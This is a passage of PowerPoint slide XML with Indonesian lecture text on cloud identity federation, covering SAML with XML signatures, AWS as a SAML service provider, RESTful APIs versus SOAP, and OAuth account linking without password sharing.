              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>eXtensible</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Markup Language (XML)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Komunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> HTTP/HTTPS dan Simple Object Access Protocol (SOAP). Token </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditandatangani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>spesifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> XML. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> digital </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengandalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempercayai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>implementasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SAML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Amazon Web Services (AWS) yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berfungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SAML. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> AWS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengembangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>izin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di AWS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di AWS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langsung</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86</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1713301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Otorisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Terbuka</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Banyak cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antarmuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemrograman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (API) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Representational State Transfer (REST), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SOAP. API </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> RESTful API. Jika SOAP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, REST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerangka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>longgar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pilihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>elemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>implementasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dibandingkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SOAP dan SAML, REST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dukungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otorisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> RESTful API </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Open Authorization (OAuth). OAuth </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memfasilitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>profil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (IdP). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menautkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsumen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> OAuth </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsumen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemilik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
